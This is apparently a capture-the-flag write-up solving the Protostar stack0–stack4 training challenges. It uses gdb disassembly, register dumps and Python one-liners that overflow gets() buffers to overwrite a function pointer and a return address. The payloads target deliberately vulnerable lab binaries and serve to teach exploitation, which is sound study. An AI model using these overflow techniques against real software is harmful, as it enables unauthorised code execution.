Protostar Stack Writeup

exploitation

Protostar stack challenge Writeup

  • it’s pretty old but gold

Challenge 1

1
2
3
$ ./stack0 
TEST 
Try again?
  • debug
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
(gdb) disas main 
Dump of assembler code for function main:
0x080483f4 <main+0>:    push   %ebp
0x080483f5 <main+1>:    mov    %esp,%ebp 
0x080483f7 <main+3>:    and    $0xfffffff0,%esp 
0x080483fa <main+6>:    sub    $0x60,%esp 
0x080483fd <main+9>:    movl   $0x0,0x5c(%esp) 
0x08048405 <main+17>:   lea    0x1c(%esp),%eax 
0x08048409 <main+21>:   mov    %eax,(%esp) 
0x0804840c <main+24>:   call   0x804830c <gets@plt> 
0x08048411 <main+29>:   mov    0x5c(%esp),%eax  
0x08048415 <main+33>:   test   %eax,%eax 
0x08048417 <main+35>:   je     0x8048427 <main+51> 
0x08048419 <main+37>:   movl   $0x8048500,(%esp) 
0x08048420 <main+44>:   call   0x804832c <puts@plt> 
0x08048425 <main+49>:   jmp    0x8048433 <main+63> 
0x08048427 <main+51>:   movl   $0x8048529,(%esp)  
0x0804842e <main+58>:   call   0x804832c <puts@plt> 
0x08048433 <main+63>:   leave 
0x08048434 <main+64>:   ret 
End of assembler dump.
  • compare eax in 0x08048415
  • bypass je instruction by changing eax value
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
(gdb) info reg
eax            0x0      0
ecx            0xbffffc6c       -1073742740
edx            0xb7fd9334       -1208118476
ebx            0xb7fd7ff4       -1208123404
esp            0xbffffc50       0xbffffc50
ebp            0xbffffcb8       0xbffffcb8
esi            0x0      0
edi            0x0      0
eip            0x8048417        0x8048417 <main+35>
eflags         0x200246 [ PF ZF IF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) b *0x08048415
(gdb) set $eax = 1
(gdb) c
Continuing.
you have changed the 'modified' variable

Program exited with code 051

Challenge 2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
(gdb) disas main
Dump of assembler code for function main:
0x08048464 <main+0>:    push   %ebp
0x08048465 <main+1>:    mov    %esp,%ebp
0x08048467 <main+3>:    and    $0xfffffff0,%esp
0x0804846a <main+6>:    sub    $0x60,%esp
0x0804846d <main+9>:    cmpl   $0x1,0x8(%ebp)
0x08048471 <main+13>:   jne    0x8048487 <main+35>
0x08048473 <main+15>:   movl   $0x80485a0,0x4(%esp)
0x0804847b <main+23>:   movl   $0x1,(%esp)
0x08048482 <main+30>:   call   0x8048388 <errx@plt>
0x08048487 <main+35>:   movl   $0x0,0x5c(%esp)
0x0804848f <main+43>:   mov    0xc(%ebp),%eax
0x08048492 <main+46>:   add    $0x4,%eax
0x08048495 <main+49>:   mov    (%eax),%eax
0x08048497 <main+51>:   mov    %eax,0x4(%esp)
0x0804849b <main+55>:   lea    0x1c(%esp),%eax
0x0804849f <main+59>:   mov    %eax,(%esp)
0x080484a2 <main+62>:   call   0x8048368 <strcpy@plt>
0x080484a7 <main+67>:   mov    0x5c(%esp),%eax
0x080484ab <main+71>:   cmp    $0x61626364,%eax
0x080484b0 <main+76>:   jne    0x80484c0 <main+92>
0x080484b2 <main+78>:   movl   $0x80485bc,(%esp)
0x080484b9 <main+85>:   call   0x8048398 <puts@plt>
0x080484be <main+90>:   jmp    0x80484d5 <main+113>
0x080484c0 <main+92>:   mov    0x5c(%esp),%edx
0x080484c4 <main+96>:   mov    $0x80485f3,%eax
0x080484c9 <main+101>:  mov    %edx,0x4(%esp)
0x080484cd <main+105>:  mov    %eax,(%esp)
0x080484d0 <main+108>:  call   0x8048378 <printf@plt>
0x080484d5 <main+113>:  leave
0x080484d6 <main+114>:  ret
End of assembler dump.
  • program compare eax with value 0x61626364 at 0x080484ab
  • change eax with the value
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
(gdb) set $eax = 0x61626364
(gdb) info reg
eax            0x61626364       1633837924
ecx            0x0      0
edx            0x9      9
ebx            0xb7fd7ff4       -1208123404
esp            0xbffffc50       0xbffffc50
ebp            0xbffffcb8       0xbffffcb8
esi            0x0      0
edi            0x0      0
eip            0x80484ab        0x80484ab <main+71>
eflags         0x200246 [ PF ZF IF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) c
Continuing.
you have correctly got the variable to the right value

Program exited with code 067.

Challenge 3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
(gdb) disas main
Dump of assembler code for function main:
0x08048494 <main+0>:    push   %ebp
0x08048495 <main+1>:    mov    %esp,%ebp
0x08048497 <main+3>:    and    $0xfffffff0,%esp
0x0804849a <main+6>:    sub    $0x60,%esp
0x0804849d <main+9>:    movl   $0x80485e0,(%esp)
0x080484a4 <main+16>:   call   0x804837c <getenv@plt>
0x080484a9 <main+21>:   mov    %eax,0x5c(%esp)
0x080484ad <main+25>:   cmpl   $0x0,0x5c(%esp)
0x080484b2 <main+30>:   jne    0x80484c8 <main+52>
0x080484b4 <main+32>:   movl   $0x80485e8,0x4(%esp)
0x080484bc <main+40>:   movl   $0x1,(%esp)
0x080484c3 <main+47>:   call   0x80483bc <errx@plt>
0x080484c8 <main+52>:   movl   $0x0,0x58(%esp)
0x080484d0 <main+60>:   mov    0x5c(%esp),%eax
0x080484d4 <main+64>:   mov    %eax,0x4(%esp)
0x080484d8 <main+68>:   lea    0x18(%esp),%eax
0x080484dc <main+72>:   mov    %eax,(%esp)
0x080484df <main+75>:   call   0x804839c <strcpy@plt>
0x080484e4 <main+80>:   mov    0x58(%esp),%eax
0x080484e8 <main+84>:   cmp    $0xd0a0d0a,%eax
0x080484ed <main+89>:   jne    0x80484fd <main+105>
0x080484ef <main+91>:   movl   $0x8048618,(%esp)
0x080484f6 <main+98>:   call   0x80483cc <puts@plt>
0x080484fb <main+103>:  jmp    0x8048512 <main+126>
0x080484fd <main+105>:  mov    0x58(%esp),%edx
0x08048501 <main+109>:  mov    $0x8048641,%eax
0x08048506 <main+114>:  mov    %edx,0x4(%esp)
0x0804850a <main+118>:  mov    %eax,(%esp)
0x0804850d <main+121>:  call   0x80483ac <printf@plt>
0x08048512 <main+126>:  leave
0x08048513 <main+127>:  ret
End of assembler dump.
  • same as above compare eax with value 0xd0a0d0a
  • change eax
1
2
3
4
5
(gdb) c
Continuing.
you have correctly modified the variable

Program exited with code 051.

challenge 4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
(gdb) disas main
Dump of assembler code for function main:
0x08048438 <main+0>:    push   %ebp
0x08048439 <main+1>:    mov    %esp,%ebp
0x0804843b <main+3>:    and    $0xfffffff0,%esp
0x0804843e <main+6>:    sub    $0x60,%esp
0x08048441 <main+9>:    movl   $0x0,0x5c(%esp)
0x08048449 <main+17>:   lea    0x1c(%esp),%eax
0x0804844d <main+21>:   mov    %eax,(%esp)
0x08048450 <main+24>:   call   0x8048330 <gets@plt>
0x08048455 <main+29>:   cmpl   $0x0,0x5c(%esp)
0x0804845a <main+34>:   je     0x8048477 <main+63>
0x0804845c <main+36>:   mov    $0x8048560,%eax
0x08048461 <main+41>:   mov    0x5c(%esp),%edx
0x08048465 <main+45>:   mov    %edx,0x4(%esp)
0x08048469 <main+49>:   mov    %eax,(%esp)
0x0804846c <main+52>:   call   0x8048350 <printf@plt>
0x08048471 <main+57>:   mov    0x5c(%esp),%eax
0x08048475 <main+61>:   call   *%eax
0x08048477 <main+63>:   leave
0x08048478 <main+64>:   ret
  • at 0x08048455 , stack pointer of 0x5c (92) is compare with 0
  • if equal jump to 0x8048477
  • let’s see
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
(gdb) b *0x08048455
Breakpoint 1 at 0x8048455: file stack3/stack3.c, line 20.
(gdb) r
Starting program: /opt/protostar/bin/stack3
AAAABBBB
Breakpoint 1, main (argc=1, argv=0xbffffd54) at stack3/stack3.c:20
20      stack3/stack3.c: No such file or directory.
        in stack3/stack3.c
(gdb) x/30x $esp+92
0xbffffc9c:     0x00000000      0x08048490      0x00000000      0xbffffd28
0xbffffcac:     0xb7eadc76      0x00000001      0xbffffd54      0xbffffd5c
0xbffffcbc:     0xb7fe1848      0xbffffd10      0xffffffff      0xb7ffeff4
0xbffffccc:     0x08048266      0x00000001      0xbffffd10      0xb7ff0626
0xbffffcdc:     0xb7fffab0      0xb7fe1b28      0xb7fd7ff4      0x00000000
0xbffffcec:     0x00000000      0xbffffd28      0x271138e0      0x0d502ef0
0xbffffcfc:     0x00000000      0x00000000      0x00000000      0x00000001
0xbffffd0c:     0x08048370      0x00000000
  • so 0xbffffc9c ( esp +92) is equal to 0
  • it will jump to 0x8048477 which is exit
  • have to modified esp +92
  • calculate the stack size
  • our input located in esp+28
1
2
3
4
5
6
7
8
9
(gdb) x/30x $esp+28
0xbffffc5c:     0x41414141      0x42424242      0x08049600      0xbffffc78
0xbffffc6c:     0x0804830c      0xb7ff1040      0x0804967c      0xbffffca8
0xbffffc7c:     0x080484a9      0xb7fd8304      0xb7fd7ff4      0x08048490
0xbffffc8c:     0xbffffca8      0xb7ec6365      0xb7ff1040      0x0804849b
0xbffffc9c:     0x00000000      0x08048490      0x00000000      0xbffffd28
0xbffffcac:     0xb7eadc76      0x00000001      0xbffffd54      0xbffffd5c
0xbffffcbc:     0xb7fe1848      0xbffffd10      0xffffffff      0xb7ffeff4
0xbffffccc:     0x08048266      0x00000001
  • substract 0xbffffc5c (esp+24) from 0xbffffc9c (esp+92)
  • size is 68 ebp is 4 bytes
  • so stack size is 64
1
2
3
$ python -c 'print "A"*64 + "BBBB" ' | ./stack3
calling function pointer, jumping to 0x42424242
Segmentation fault
  • so we have to jump to some function, in source code there is win function
  • let’s find location of win function and redirect to it
1
2
3
4
5
6
$ objdump -d stack3 |grep win
08048424 <win>:

$ python -c 'print "A"*64 + "\x24\x84\x04\x08" ' | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

challenge 5

1
2
3
4
5
6
7
8
9
10
11
Dump of assembler code for function main:
0x08048408 <main+0>:    push   %ebp
0x08048409 <main+1>:    mov    %esp,%ebp
0x0804840b <main+3>:    and    $0xfffffff0,%esp
0x0804840e <main+6>:    sub    $0x50,%esp
0x08048411 <main+9>:    lea    0x10(%esp),%eax
0x08048415 <main+13>:   mov    %eax,(%esp)
0x08048418 <main+16>:   call   0x804830c <gets@plt>
0x0804841d <main+21>:   leave
0x0804841e <main+22>:   ret
End of assembler dump.

  • calculate buffer

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    eax            0xbffffd64       -1073742492
    ecx            0x104270a        17049354
    edx            0x1      1
    ebx            0xb7fd7ff4       -1208123404
    esp            0xbffffc60       0xbffffc60
    ebp            0xbffffcb8       0xbffffcb8
    esi            0x0      0
    edi            0x0      0
    eip            0x8048411        0x8048411 <main+9>
    eflags         0x200286 [ PF SF IF ID ]
    cs             0x73     115
    ss             0x7b     123
    ds             0x7b     123
    es             0x7b     123
    fs             0x0      0
    gs             0x33     51

  • esp start with 0xbffffc60 and end 0xbffffcc0 size is 96 bytes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
(gdb) break main
Breakpoint 1 at 0x8048411: file stack4/stack4.c, line 15.
(gdb) shell python -c 'print "A"*80 ' > /tmp/stack4
(gdb) r < /tmp/stack4
Starting program: /opt/protostar/bin/stack4 < /tmp/stack4

Breakpoint 1, main (argc=1, argv=0xbffffd64) at stack4/stack4.c:15
15      stack4/stack4.c: No such file or directory.
        in stack4/stack4.c
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()